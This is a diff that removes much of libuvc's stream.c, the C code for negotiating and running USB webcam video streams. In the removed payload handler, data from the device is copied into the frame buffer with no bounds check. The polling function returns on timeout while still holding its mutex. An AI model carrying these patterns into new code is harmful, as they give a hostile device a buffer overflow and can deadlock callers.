-      uvc_frame_desc_t *frame = uvc_find_frame_desc(devh, ctrl->bFormatIndex, ctrl->bFrameIndex);
-
-      if (frame) {
-        ctrl->dwMaxVideoFrameSize = frame->dwMaxVideoFrameBufferSize;
-      }
-    }
-  }
-
-  return UVC_SUCCESS;
-}
-
-/** @brief Reconfigure stream with a new stream format.
- * @ingroup streaming
- *
- * This may be executed whether or not the stream is running.
- *
- * @param[in] strmh Stream handle
- * @param[in] ctrl Control block, processed using {uvc_probe_stream_ctrl} or
- *             {uvc_get_stream_ctrl_format_size}
- */
-uvc_error_t uvc_stream_ctrl(uvc_stream_handle_t *strmh, uvc_stream_ctrl_t *ctrl) {
-  uvc_error_t ret;
-
-  if (strmh->stream_if->bInterfaceNumber != ctrl->bInterfaceNumber)
-    return UVC_ERROR_INVALID_PARAM;
-
-  /* @todo Allow the stream to be modified without restarting the stream */
-  if (strmh->running)
-    return UVC_ERROR_BUSY;
-
-  ret = uvc_query_stream_ctrl(strmh->devh, ctrl, 0, UVC_SET_CUR);
-  if (ret != UVC_SUCCESS)
-    return ret;
-
-  strmh->cur_ctrl = *ctrl;
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Find the descriptor for a specific frame configuration
- * @param stream_if Stream interface
- * @param format_id Index of format class descriptor
- * @param frame_id Index of frame descriptor
- */
-static uvc_frame_desc_t *_uvc_find_frame_desc_stream_if(uvc_streaming_interface_t *stream_if,
-    uint16_t format_id, uint16_t frame_id) {
- 
-  uvc_format_desc_t *format = NULL;
-  uvc_frame_desc_t *frame = NULL;
-
-  DL_FOREACH(stream_if->format_descs, format) {
-    if (format->bFormatIndex == format_id) {
-      DL_FOREACH(format->frame_descs, frame) {
-        if (frame->bFrameIndex == frame_id)
-          return frame;
-      }
-    }
-  }
-
-  return NULL;
-}
-
-uvc_frame_desc_t *uvc_find_frame_desc_stream(uvc_stream_handle_t *strmh,
-    uint16_t format_id, uint16_t frame_id) {
-  return _uvc_find_frame_desc_stream_if(strmh->stream_if, format_id, frame_id);
-}
-
-/** @internal
- * @brief Find the descriptor for a specific frame configuration
- * @param devh UVC device
- * @param format_id Index of format class descriptor
- * @param frame_id Index of frame descriptor
- */
-uvc_frame_desc_t *uvc_find_frame_desc(uvc_device_handle_t *devh,
-    uint16_t format_id, uint16_t frame_id) {
- 
-  uvc_streaming_interface_t *stream_if;
-  uvc_frame_desc_t *frame;
-
-  DL_FOREACH(devh->info->stream_ifs, stream_if) {
-    frame = _uvc_find_frame_desc_stream_if(stream_if, format_id, frame_id);
-    if (frame)
-      return frame;
-  }
-
-  return NULL;
-}
-
-/** Get a negotiated streaming control block for some common parameters.
- * @ingroup streaming
- *
- * @param[in] devh Device handle
- * @param[in,out] ctrl Control block
- * @param[in] format_class Type of streaming format
- * @param[in] width Desired frame width
- * @param[in] height Desired frame height
- * @param[in] fps Frame rate, frames per second
- */
-uvc_error_t uvc_get_stream_ctrl_format_size(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    enum uvc_frame_format cf,
-    int width, int height,
-    int fps) {
-  uvc_streaming_interface_t *stream_if;
-
-  /* find a matching frame descriptor and interval */
-  DL_FOREACH(devh->info->stream_ifs, stream_if) {
-    uvc_format_desc_t *format;
-
-    DL_FOREACH(stream_if->format_descs, format) {
-      uvc_frame_desc_t *frame;
-
-      if (!_uvc_frame_format_matches_guid(cf, format->guidFormat))
-        continue;
-
-      DL_FOREACH(format->frame_descs, frame) {
-        if (frame->wWidth != width || frame->wHeight != height)
-          continue;
-
-        uint32_t *interval;
-
-        ctrl->bInterfaceNumber = stream_if->bInterfaceNumber;
-        UVC_DEBUG("claiming streaming interface %d", stream_if->bInterfaceNumber );
-        uvc_claim_if(devh, ctrl->bInterfaceNumber);
-        /* get the max values */
-        uvc_query_stream_ctrl( devh, ctrl, 1, UVC_GET_MAX);
-
-        if (frame->intervals) {
-          for (interval = frame->intervals; *interval; ++interval) {
-            // allow a fps rate of zero to mean "accept first rate available"
-            if (10000000 / *interval == (unsigned int) fps || fps == 0) {
-
-              ctrl->bmHint = (1 << 0); /* don't negotiate interval */
-              ctrl->bFormatIndex = format->bFormatIndex;
-              ctrl->bFrameIndex = frame->bFrameIndex;
-              ctrl->dwFrameInterval = *interval;
-
-              goto found;
-            }
-          }
-        } else {
-          uint32_t interval_100ns = 10000000 / fps;
-          uint32_t interval_offset = interval_100ns - frame->dwMinFrameInterval;
-
-          if (interval_100ns >= frame->dwMinFrameInterval
-              && interval_100ns <= frame->dwMaxFrameInterval
-              && !(interval_offset
-                   && (interval_offset % frame->dwFrameIntervalStep))) {
-
-            ctrl->bmHint = (1 << 0);
-            ctrl->bFormatIndex = format->bFormatIndex;
-            ctrl->bFrameIndex = frame->bFrameIndex;
-            ctrl->dwFrameInterval = interval_100ns;
-
-            goto found;
-          }
-        }
-      }
-    }
-  }
-
-  return UVC_ERROR_INVALID_MODE;
-
-found:
-  return uvc_probe_stream_ctrl(devh, ctrl);
-}
-
-/** @internal
- * Negotiate streaming parameters with the device
- *
- * @param[in] devh UVC device
- * @param[in,out] ctrl Control block
- */
-uvc_error_t uvc_probe_stream_ctrl(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl) {
- 
-  uvc_query_stream_ctrl(
-      devh, ctrl, 1, UVC_SET_CUR
-  );
-
-  uvc_query_stream_ctrl(
-      devh, ctrl, 1, UVC_GET_CUR
-  );
-
-  /** @todo make sure that worked */
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Swap the working buffer with the presented buffer and notify consumers
- */
-void _uvc_swap_buffers(uvc_stream_handle_t *strmh) {
-  uint8_t *tmp_buf;
-
-  pthread_mutex_lock(&strmh->cb_mutex);
-
-  /* swap the buffers */
-  tmp_buf = strmh->holdbuf;
-  strmh->hold_bytes = strmh->got_bytes;
-  strmh->holdbuf = strmh->outbuf;
-  strmh->outbuf = tmp_buf;
-  strmh->hold_last_scr = strmh->last_scr;
-  strmh->hold_pts = strmh->pts;
-  strmh->hold_seq = strmh->seq;
-
-  pthread_cond_broadcast(&strmh->cb_cond);
-  pthread_mutex_unlock(&strmh->cb_mutex);
-
-  strmh->seq++;
-  strmh->got_bytes = 0;
-  strmh->last_scr = 0;
-  strmh->pts = 0;
-}
-
-/** @internal
- * @brief Process a payload transfer
- * 
- * Processes stream, places frames into buffer, signals listeners
- * (such as user callback thread and any polling thread) on new frame
- *
- * @param payload Contents of the payload transfer, either a packet (isochronous) or a full
- * transfer (bulk mode)
- * @param payload_len Length of the payload transfer
- */
-void _uvc_process_payload(uvc_stream_handle_t *strmh, uint8_t *payload, size_t payload_len) {
-  size_t header_len;
-  uint8_t header_info;
-  size_t data_len;
-
-  /* magic numbers for identifying header packets from some iSight cameras */
-  static uint8_t isight_tag[] = {
-    0x11, 0x22, 0x33, 0x44,
-    0xde, 0xad, 0xbe, 0xef, 0xde, 0xad, 0xfa, 0xce
-  };
-
-  /* ignore empty payload transfers */
-  if (payload_len == 0)
-    return;
-
-  /* Certain iSight cameras have strange behavior: They send header
-   * information in a packet with no image data, and then the following
-   * packets have only image data, with no more headers until the next frame.
-   *
-   * The iSight header: len(1), flags(1 or 2), 0x11223344(4),
-   * 0xdeadbeefdeadface(8), ??(16)
-   */
-
-  if (strmh->devh->is_isight &&
-      (payload_len < 14 || memcmp(isight_tag, payload + 2, sizeof(isight_tag))) &&
-      (payload_len < 15 || memcmp(isight_tag, payload + 3, sizeof(isight_tag)))) {
-    /* The payload transfer doesn't have any iSight magic, so it's all image data */
-    header_len = 0;
-    data_len = payload_len;
-  } else {
-    header_len = payload[0];
-
-    if (header_len > payload_len) {
-      UVC_DEBUG("bogus packet: actual_len=%zd, header_len=%zd\n", payload_len, header_len);
-      return;
-    }
-
-    if (strmh->devh->is_isight)
-      data_len = 0;
-    else
-      data_len = payload_len - header_len;
-  }
-
-  if (header_len < 2) {
-    header_info = 0;
-  } else {
-    /** @todo we should be checking the end-of-header bit */
-    size_t variable_offset = 2;
-
-    header_info = payload[1];
-
-    if (header_info & 0x40) {
-      UVC_DEBUG("bad packet: error bit set");
-      return;
-    }
-
-    if (strmh->fid != (header_info & 1) && strmh->got_bytes != 0) {
-      /* The frame ID bit was flipped, but we have image data sitting
-         around from prior transfers. This means the camera didn't send
-         an EOF for the last transfer of the previous frame. */
-      _uvc_swap_buffers(strmh);
-    }
-
-    strmh->fid = header_info & 1;
-
-    if (header_info & (1 << 2)) {
-      strmh->pts = DW_TO_INT(payload + variable_offset);
-      variable_offset += 4;
-    }
-
-    if (header_info & (1 << 3)) {
-      /** @todo read the SOF token counter */
-      strmh->last_scr = DW_TO_INT(payload + variable_offset);
-      variable_offset += 6;
-    }
-  }
-
-  if (data_len > 0) {
-    memcpy(strmh->outbuf + strmh->got_bytes, payload + header_len, data_len);
-    strmh->got_bytes += data_len;
-
-    if (header_info & (1 << 1)) {
-      /* The EOF bit is set, so publish the complete frame */
-      _uvc_swap_buffers(strmh);
-    }
-  }
-}
-
-/** @internal
- * @brief Stream transfer callback
- *
- * Processes stream, places frames into buffer, signals listeners
- * (such as user callback thread and any polling thread) on new frame
- *
- * @param transfer Active transfer
- */
-void LIBUSB_CALL _uvc_stream_callback(struct libusb_transfer *transfer) {
-  uvc_stream_handle_t *strmh = transfer->user_data;
-
-  int resubmit = 1;
-
-  switch (transfer->status) {
-  case LIBUSB_TRANSFER_COMPLETED:
-    if (transfer->num_iso_packets == 0) {
-      /* This is a bulk mode transfer, so it just has one payload transfer */
-      _uvc_process_payload(strmh, transfer->buffer, transfer->actual_length);
-    } else {
-      /* This is an isochronous mode transfer, so each packet has a payload transfer */
-      int packet_id;
-
-      for (packet_id = 0; packet_id < transfer->num_iso_packets; ++packet_id) {
-        uint8_t *pktbuf;
-        struct libusb_iso_packet_descriptor *pkt;
-
-        pkt = transfer->iso_packet_desc + packet_id;
-
-        if (pkt->status != 0) {
-          UVC_DEBUG("bad packet (isochronous transfer); status: %d", pkt->status);
-          continue;
-        }
-
-        pktbuf = libusb_get_iso_packet_buffer_simple(transfer, packet_id);
-
-        _uvc_process_payload(strmh, pktbuf, pkt->actual_length);
-
-      }
-    }
-    break;
-  case LIBUSB_TRANSFER_CANCELLED: 
-  case LIBUSB_TRANSFER_ERROR:
-  case LIBUSB_TRANSFER_NO_DEVICE: {
-    int i;
-    UVC_DEBUG("not retrying transfer, status = %d", transfer->status);
-    pthread_mutex_lock(&strmh->cb_mutex);
-
-    /* Mark transfer as deleted. */
-    for(i=0; i < LIBUVC_NUM_TRANSFER_BUFS; i++) {
-      if(strmh->transfers[i] == transfer) {
-        UVC_DEBUG("Freeing transfer %d (%p)", i, transfer);
-        free(transfer->buffer);
-        libusb_free_transfer(transfer);
-        strmh->transfers[i] = NULL;
-        break;
-      }
-    }
-    if(i == LIBUVC_NUM_TRANSFER_BUFS ) {
-      UVC_DEBUG("transfer %p not found; not freeing!", transfer);
-    }
-
-    resubmit = 0;
-
-    pthread_cond_broadcast(&strmh->cb_cond);
-    pthread_mutex_unlock(&strmh->cb_mutex);
-
-    break;
-  }
-  case LIBUSB_TRANSFER_TIMED_OUT:
-  case LIBUSB_TRANSFER_STALL:
-  case LIBUSB_TRANSFER_OVERFLOW:
-    UVC_DEBUG("retrying transfer, status = %d", transfer->status);
-    break;
-  }
-  
-  if ( resubmit ) {
-    if ( strmh->running ) {
-      libusb_submit_transfer(transfer);
-    } else {
-      int i;
-      pthread_mutex_lock(&strmh->cb_mutex);
-
-      /* Mark transfer as deleted. */
-      for(i=0; i < LIBUVC_NUM_TRANSFER_BUFS; i++) {
-        if(strmh->transfers[i] == transfer) {
-          UVC_DEBUG("Freeing orphan transfer %d (%p)", i, transfer);
-          free(transfer->buffer);
-          libusb_free_transfer(transfer);
-          strmh->transfers[i] = NULL;
-        }
-      }
-      if(i == LIBUVC_NUM_TRANSFER_BUFS ) {
-        UVC_DEBUG("orphan transfer %p not found; not freeing!", transfer);
-      }
-
-      pthread_cond_broadcast(&strmh->cb_cond);
-      pthread_mutex_unlock(&strmh->cb_mutex);
-    }
-  }
-}
-
-/** Begin streaming video from the camera into the callback function.
- * @ingroup streaming
- *
- * @param devh UVC device
- * @param ctrl Control block, processed using {uvc_probe_stream_ctrl} or
- *             {uvc_get_stream_ctrl_format_size}
- * @param cb   User callback function. See {uvc_frame_callback_t} for restrictions.
- * @param flags Stream setup flags, currently undefined. Set this to zero. The lower bit
- * is reserved for backward compatibility.
- */
-uvc_error_t uvc_start_streaming(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    uvc_frame_callback_t *cb,
-    void *user_ptr,
-    uint8_t flags
-) {
-  uvc_error_t ret;
-  uvc_stream_handle_t *strmh;
-
-  ret = uvc_stream_open_ctrl(devh, &strmh, ctrl);
-  if (ret != UVC_SUCCESS)
-    return ret;
-
-  ret = uvc_stream_start(strmh, cb, user_ptr, flags);
-  if (ret != UVC_SUCCESS) {
-    uvc_stream_close(strmh);
-    return ret;
-  }
-
-  return UVC_SUCCESS;
-}
-
-/** Begin streaming video from the camera into the callback function.
- * @ingroup streaming
- *
- * @deprecated The stream type (bulk vs. isochronous) will be determined by the
- * type of interface associated with the uvc_stream_ctrl_t parameter, regardless
- * of whether the caller requests isochronous streaming. Please switch to
- * uvc_start_streaming().
- *
- * @param devh UVC device
- * @param ctrl Control block, processed using {uvc_probe_stream_ctrl} or
- *             {uvc_get_stream_ctrl_format_size}
- * @param cb   User callback function. See {uvc_frame_callback_t} for restrictions.
- */
-uvc_error_t uvc_start_iso_streaming(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    uvc_frame_callback_t *cb,
-    void *user_ptr
-) {
-  return uvc_start_streaming(devh, ctrl, cb, user_ptr, 0);
-}
-
-static uvc_stream_handle_t *_uvc_get_stream_by_interface(uvc_device_handle_t *devh, int interface_idx) {
-  uvc_stream_handle_t *strmh;
-
-  DL_FOREACH(devh->streams, strmh) {
-    if (strmh->stream_if->bInterfaceNumber == interface_idx)
-      return strmh;
-  }
-
-  return NULL;
-}
-
-static uvc_streaming_interface_t *_uvc_get_stream_if(uvc_device_handle_t *devh, int interface_idx) {
-  uvc_streaming_interface_t *stream_if;
-
-  DL_FOREACH(devh->info->stream_ifs, stream_if) {
-    if (stream_if->bInterfaceNumber == interface_idx)
-      return stream_if;
-  }
-  
-  return NULL;
-}
-
-/** Open a new video stream.
- * @ingroup streaming
- *
- * @param devh UVC device
- * @param ctrl Control block, processed using {uvc_probe_stream_ctrl} or
- *             {uvc_get_stream_ctrl_format_size}
- */
-uvc_error_t uvc_stream_open_ctrl(uvc_device_handle_t *devh, uvc_stream_handle_t **strmhp, uvc_stream_ctrl_t *ctrl) {
-  /* Chosen frame and format descriptors */
-  uvc_stream_handle_t *strmh = NULL;
-  uvc_streaming_interface_t *stream_if;
-  uvc_error_t ret;
-
-  UVC_ENTER();
-
-  if (_uvc_get_stream_by_interface(devh, ctrl->bInterfaceNumber) != NULL) {
-    ret = UVC_ERROR_BUSY; /* Stream is already opened */
-    goto fail;
-  }
-
-  stream_if = _uvc_get_stream_if(devh, ctrl->bInterfaceNumber);
-  if (!stream_if) {
-    ret = UVC_ERROR_INVALID_PARAM;
-    goto fail;
-  }
-
-  strmh = calloc(1, sizeof(*strmh));
-  if (!strmh) {
-    ret = UVC_ERROR_NO_MEM;
-    goto fail;
-  }
-  strmh->devh = devh;
-  strmh->stream_if = stream_if;
-  strmh->frame.library_owns_data = 1;
-
-  ret = uvc_claim_if(strmh->devh, strmh->stream_if->bInterfaceNumber);
-  if (ret != UVC_SUCCESS)
-    goto fail;
-
-  ret = uvc_stream_ctrl(strmh, ctrl);
-  if (ret != UVC_SUCCESS)
-    goto fail;
-
-  // Set up the streaming status and data space
-  strmh->running = 0;
-  /** @todo take only what we need */
-  strmh->outbuf = malloc( LIBUVC_XFER_BUF_SIZE );
-  strmh->holdbuf = malloc( LIBUVC_XFER_BUF_SIZE );
-   
-  pthread_mutex_init(&strmh->cb_mutex, NULL);
-  pthread_cond_init(&strmh->cb_cond, NULL);
-
-  DL_APPEND(devh->streams, strmh);
-
-  *strmhp = strmh;
-
-  UVC_EXIT(0);
-  return UVC_SUCCESS;
-
-fail:
-  if(strmh)
-    free(strmh);
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** Begin streaming video from the stream into the callback function.
- * @ingroup streaming
- *
- * @param strmh UVC stream
- * @param cb   User callback function. See {uvc_frame_callback_t} for restrictions.
- * @param flags Stream setup flags, currently undefined. Set this to zero. The lower bit
- * is reserved for backward compatibility.
- */
-uvc_error_t uvc_stream_start(
-    uvc_stream_handle_t *strmh,
-    uvc_frame_callback_t *cb,
-    void *user_ptr,
-    uint8_t flags
-) {
-  /* USB interface we'll be using */
-  const struct libusb_interface *interface;
-  int interface_id;
-  char isochronous;
-  uvc_frame_desc_t *frame_desc;
-  uvc_format_desc_t *format_desc;
-  uvc_stream_ctrl_t *ctrl;
-  uvc_error_t ret;
-  /* Total amount of data per transfer */
-  size_t total_transfer_size = 0;
-  struct libusb_transfer *transfer;
-  int transfer_id;
-
-  ctrl = &strmh->cur_ctrl;
-
-  UVC_ENTER();
-
-  if (strmh->running) {
-    UVC_EXIT(UVC_ERROR_BUSY);
-    return UVC_ERROR_BUSY;
-  }
-
-  strmh->running = 1;
-  strmh->seq = 1;
-  strmh->fid = 0;
-  strmh->pts = 0;
-  strmh->last_scr = 0;
-
-  frame_desc = uvc_find_frame_desc_stream(strmh, ctrl->bFormatIndex, ctrl->bFrameIndex);
-  if (!frame_desc) {
-    ret = UVC_ERROR_INVALID_PARAM;
-    goto fail;
-  }
-  format_desc = frame_desc->parent;
-
-  strmh->frame_format = uvc_frame_format_for_guid(format_desc->guidFormat);
-  if (strmh->frame_format == UVC_FRAME_FORMAT_UNKNOWN) {
-    ret = UVC_ERROR_NOT_SUPPORTED;
-    goto fail;
-  }
-
-  // Get the interface that provides the chosen format and frame configuration
-  interface_id = strmh->stream_if->bInterfaceNumber;
-  interface = &strmh->devh->info->config->interface[interface_id];
-
-  /* A VS interface uses isochronous transfers iff it has multiple altsettings.
-   * (UVC 1.5: 2.4.3. VideoStreaming Interface) */
-  isochronous = interface->num_altsetting > 1;
-
-  if (isochronous) {
-    /* For isochronous streaming, we choose an appropriate altsetting for the endpoint
-     * and set up several transfers */
-    const struct libusb_interface_descriptor *altsetting = 0;
-    const struct libusb_endpoint_descriptor *endpoint;
-    /* The greatest number of bytes that the device might provide, per packet, in this
-     * configuration */
-    size_t config_bytes_per_packet;
-    /* Number of packets per transfer */
-    size_t packets_per_transfer = 0;
-    /* Size of packet transferable from the chosen endpoint */
-    size_t endpoint_bytes_per_packet = 0;
-    /* Index of the altsetting */
-    int alt_idx, ep_idx;
-    
-    config_bytes_per_packet = strmh->cur_ctrl.dwMaxPayloadTransferSize;
-
-    /* Go through the altsettings and find one whose packets are at least
-     * as big as our format's maximum per-packet usage. Assume that the
-     * packet sizes are increasing. */
-    for (alt_idx = 0; alt_idx < interface->num_altsetting; alt_idx++) {
-      altsetting = interface->altsetting + alt_idx;
-      endpoint_bytes_per_packet = 0;
-
-      /* Find the endpoint with the number specified in the VS header */
-      for (ep_idx = 0; ep_idx < altsetting->bNumEndpoints; ep_idx++) {
-        endpoint = altsetting->endpoint + ep_idx;
-
-        if (endpoint->bEndpointAddress == format_desc->parent->bEndpointAddress) {
-          endpoint_bytes_per_packet = endpoint->wMaxPacketSize;
-          // wMaxPacketSize: [unused:2 (multiplier-1):3 size:11]
-          endpoint_bytes_per_packet = (endpoint_bytes_per_packet & 0x07ff) *
-                                      (((endpoint_bytes_per_packet >> 11) & 3) + 1);
-          break;
-        }
-      }
-
-      if (endpoint_bytes_per_packet >= config_bytes_per_packet) {
-        /* Transfers will be at most one frame long: Divide the maximum frame size
-         * by the size of the endpoint and round up */
-        packets_per_transfer = (ctrl->dwMaxVideoFrameSize +
-                                endpoint_bytes_per_packet - 1) / endpoint_bytes_per_packet;
-
-        /* But keep a reasonable limit: Otherwise we start dropping data */
-        if (packets_per_transfer > 32)
-          packets_per_transfer = 32;
-        
-        total_transfer_size = packets_per_transfer * endpoint_bytes_per_packet;
-        break;
-      }
-    }
-
-    /* If we searched through all the altsettings and found nothing usable */
-    if (alt_idx == interface->num_altsetting) {
-      ret = UVC_ERROR_INVALID_MODE;
-      goto fail;
-    }
-
-    /* Select the altsetting */
-    ret = libusb_set_interface_alt_setting(strmh->devh->usb_devh,
-                                           altsetting->bInterfaceNumber,
-                                           altsetting->bAlternateSetting);
-    if (ret != UVC_SUCCESS) {
-      UVC_DEBUG("libusb_set_interface_alt_setting failed");
-      goto fail;
-    }
-
-    /* Set up the transfers */
-    for (transfer_id = 0; transfer_id < LIBUVC_NUM_TRANSFER_BUFS; ++transfer_id) {
-      transfer = libusb_alloc_transfer(packets_per_transfer);
-      strmh->transfers[transfer_id] = transfer;      
-      strmh->transfer_bufs[transfer_id] = malloc(total_transfer_size);
-
-      libusb_fill_iso_transfer(
-        transfer, strmh->devh->usb_devh, format_desc->parent->bEndpointAddress,
-        strmh->transfer_bufs[transfer_id],
-        total_transfer_size, packets_per_transfer, _uvc_stream_callback, (void*) strmh, 5000);
-
-      libusb_set_iso_packet_lengths(transfer, endpoint_bytes_per_packet);
-    }
-  } else {
-    for (transfer_id = 0; transfer_id < LIBUVC_NUM_TRANSFER_BUFS;
-        ++transfer_id) {
-      transfer = libusb_alloc_transfer(0);
-      strmh->transfers[transfer_id] = transfer;
-      strmh->transfer_bufs[transfer_id] = malloc (
-          strmh->cur_ctrl.dwMaxPayloadTransferSize );
-      libusb_fill_bulk_transfer ( transfer, strmh->devh->usb_devh,
-          format_desc->parent->bEndpointAddress,
-          strmh->transfer_bufs[transfer_id],
-          strmh->cur_ctrl.dwMaxPayloadTransferSize, _uvc_stream_callback,
-          ( void* ) strmh, 5000 );
-    }
-  }
-
-  strmh->user_cb = cb;
-  strmh->user_ptr = user_ptr;
-
-  /* If the user wants it, set up a thread that calls the user's function
-   * with the contents of each frame.
-   */
-  if (cb) {
-    pthread_create(&strmh->cb_thread, NULL, _uvc_user_caller, (void*) strmh);
-  }
-
-  for (transfer_id = 0; transfer_id < LIBUVC_NUM_TRANSFER_BUFS;
-      transfer_id++) {
-    ret = libusb_submit_transfer(strmh->transfers[transfer_id]);
-    if (ret != UVC_SUCCESS) {
-      UVC_DEBUG("libusb_submit_transfer failed: %d",ret);
-      break;
-    }
-  }
-
-  if ( ret != UVC_SUCCESS && transfer_id > 0 ) {
-    for ( ; transfer_id < LIBUVC_NUM_TRANSFER_BUFS; transfer_id++) {
-      free ( strmh->transfers[transfer_id]->buffer );
-      libusb_free_transfer ( strmh->transfers[transfer_id]);
-      strmh->transfers[transfer_id] = 0;
-    }
-    ret = UVC_SUCCESS;
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-fail:
-  strmh->running = 0;
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** Begin streaming video from the stream into the callback function.
- * @ingroup streaming
- *
- * @deprecated The stream type (bulk vs. isochronous) will be determined by the
- * type of interface associated with the uvc_stream_ctrl_t parameter, regardless
- * of whether the caller requests isochronous streaming. Please switch to
- * uvc_stream_start().
- *
- * @param strmh UVC stream
- * @param cb   User callback function. See {uvc_frame_callback_t} for restrictions.
- */
-uvc_error_t uvc_stream_start_iso(
-    uvc_stream_handle_t *strmh,
-    uvc_frame_callback_t *cb,
-    void *user_ptr
-) {
-  return uvc_stream_start(strmh, cb, user_ptr, 0);
-}
-
-/** @internal
- * @brief User callback runner thread
- * @note There should be at most one of these per currently streaming device
- * @param arg Device handle
- */
-void *_uvc_user_caller(void *arg) {
-  uvc_stream_handle_t *strmh = (uvc_stream_handle_t *) arg;
-
-  uint32_t last_seq = 0;
-
-  do {
-    pthread_mutex_lock(&strmh->cb_mutex);
-
-    while (strmh->running && last_seq == strmh->hold_seq) {
-      pthread_cond_wait(&strmh->cb_cond, &strmh->cb_mutex);
-    }
-
-    if (!strmh->running) {
-      pthread_mutex_unlock(&strmh->cb_mutex);
-      break;
-    }
-    
-    last_seq = strmh->hold_seq;
-    _uvc_populate_frame(strmh);
-    
-    pthread_mutex_unlock(&strmh->cb_mutex);
-    
-    strmh->user_cb(&strmh->frame, strmh->user_ptr);
-  } while(1);
-
-  return NULL; // return value ignored
-}
-
-/** @internal
- * @brief Populate the fields of a frame to be handed to user code
- * must be called with stream cb lock held!
- */
-void _uvc_populate_frame(uvc_stream_handle_t *strmh) {
-  uvc_frame_t *frame = &strmh->frame;
-  uvc_frame_desc_t *frame_desc;
-
-  /** @todo this stuff that hits the main config cache should really happen
-   * in start() so that only one thread hits these data. all of this stuff
-   * is going to be reopen_on_change anyway
-   */
-
-  frame_desc = uvc_find_frame_desc(strmh->devh, strmh->cur_ctrl.bFormatIndex,
-				   strmh->cur_ctrl.bFrameIndex);
-
-  frame->frame_format = strmh->frame_format;
-  
-  frame->width = frame_desc->wWidth;
-  frame->height = frame_desc->wHeight;
-  
-  switch (frame->frame_format) {
-  case UVC_FRAME_FORMAT_YUYV:
-    frame->step = frame->width * 2;
-    break;
-  case UVC_FRAME_FORMAT_MJPEG:
-    frame->step = 0;
-    break;
-  default:
-    frame->step = 0;
-    break;
-  }
-
-  frame->sequence = strmh->hold_seq;
-  /** @todo set the frame time */
-  // frame->capture_time
-
-  /* copy the image data from the hold buffer to the frame (unnecessary extra buf?) */
-  if (frame->data_bytes < strmh->hold_bytes) {
-    frame->data = realloc(frame->data, strmh->hold_bytes);
-  }
-  frame->data_bytes = strmh->hold_bytes;
-  memcpy(frame->data, strmh->holdbuf, frame->data_bytes);
-
-
-
-}
-
-/** Poll for a frame
- * @ingroup streaming
- *
- * @param devh UVC device
- * @param[out] frame Location to store pointer to captured frame (NULL on error)
- * @param timeout_us >0: Wait at most N microseconds; 0: Wait indefinitely; -1: return immediately
- */
-uvc_error_t uvc_stream_get_frame(uvc_stream_handle_t *strmh,
-			  uvc_frame_t **frame,
-			  int32_t timeout_us) {
-  time_t add_secs;
-  time_t add_nsecs;
-  struct timespec ts;
-  struct timeval tv;
-
-  if (!strmh->running)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (strmh->user_cb)
-    return UVC_ERROR_CALLBACK_EXISTS;
-
-  pthread_mutex_lock(&strmh->cb_mutex);
-
-  if (strmh->last_polled_seq < strmh->hold_seq) {
-    _uvc_populate_frame(strmh);
-    *frame = &strmh->frame;
-    strmh->last_polled_seq = strmh->hold_seq;
-  } else if (timeout_us != -1) {
-    if (timeout_us == 0) {
-      pthread_cond_wait(&strmh->cb_cond, &strmh->cb_mutex);
-    } else {
-      add_secs = timeout_us / 1000000;
-      add_nsecs = (timeout_us % 1000000) * 1000;
-      ts.tv_sec = 0;
-      ts.tv_nsec = 0;
-
-#if _POSIX_TIMERS > 0
-      clock_gettime(CLOCK_REALTIME, &ts);
-#else
-      gettimeofday(&tv, NULL);
-      ts.tv_sec = tv.tv_sec;
-      ts.tv_nsec = tv.tv_usec * 1000;
-#endif
-
-      ts.tv_sec += add_secs;
-      ts.tv_nsec += add_nsecs;
-
-      /* pthread_cond_timedwait FAILS with EINVAL if ts.tv_nsec > 1000000000 (1 billion)
-       * Since we are just adding values to the timespec, we have to increment the seconds if nanoseconds is greater than 1 billion,
-       * and then re-adjust the nanoseconds in the correct range.
-       * */
-      ts.tv_sec += ts.tv_nsec / 1000000000;
-      ts.tv_nsec = ts.tv_nsec % 1000000000;
-
-      int err = pthread_cond_timedwait(&strmh->cb_cond, &strmh->cb_mutex, &ts);
-
-      //TODO: How should we handle EINVAL?
-      switch(err){
-      case EINVAL:
-          *frame = NULL;
-          return UVC_ERROR_OTHER;
-      case ETIMEDOUT:
-          *frame = NULL;
-          return UVC_ERROR_TIMEOUT;
-      }
-    }
-    
-    if (strmh->last_polled_seq < strmh->hold_seq) {
-      _uvc_populate_frame(strmh);
-      *frame = &strmh->frame;
-      strmh->last_polled_seq = strmh->hold_seq;
-    } else {
-      *frame = NULL;
-    }
-  } else {
-    *frame = NULL;
-  }
-
-  pthread_mutex_unlock(&strmh->cb_mutex);
-
-  return UVC_SUCCESS;
-}
-
-/** @brief Stop streaming video
- * @ingroup streaming
- *
- * Closes all streams, ends threads and cancels pollers
- *
- * @param devh UVC device
- */
-void uvc_stop_streaming(uvc_device_handle_t *devh) {
-  uvc_stream_handle_t *strmh, *strmh_tmp;
-
-  DL_FOREACH_SAFE(devh->streams, strmh, strmh_tmp) {
-    uvc_stream_close(strmh);
-  }
-}
-
-/** @brief Stop stream.
- * @ingroup streaming
- *
- * Stops stream, ends threads and cancels pollers
- *
- * @param devh UVC device
- */
-uvc_error_t uvc_stream_stop(uvc_stream_handle_t *strmh) {
-  int i;
-
-  if (!strmh->running)
-    return UVC_ERROR_INVALID_PARAM;
-
-  strmh->running = 0;
-
-  pthread_mutex_lock(&strmh->cb_mutex);
-
-  for(i=0; i < LIBUVC_NUM_TRANSFER_BUFS; i++) {
-    if(strmh->transfers[i] != NULL) {
-      int res = libusb_cancel_transfer(strmh->transfers[i]);
-      if(res < 0 && res != LIBUSB_ERROR_NOT_FOUND ) {
-        free(strmh->transfers[i]->buffer);
-        libusb_free_transfer(strmh->transfers[i]);
-        strmh->transfers[i] = NULL;
-      }
-    }
-  }
-
-  /* Wait for transfers to complete/cancel */
-  do {
-    for(i=0; i < LIBUVC_NUM_TRANSFER_BUFS; i++) {
-      if(strmh->transfers[i] != NULL)
-        break;
-    }
-    if(i == LIBUVC_NUM_TRANSFER_BUFS )
-      break;
-    pthread_cond_wait(&strmh->cb_cond, &strmh->cb_mutex);
-  } while(1);
-  // Kick the user thread awake
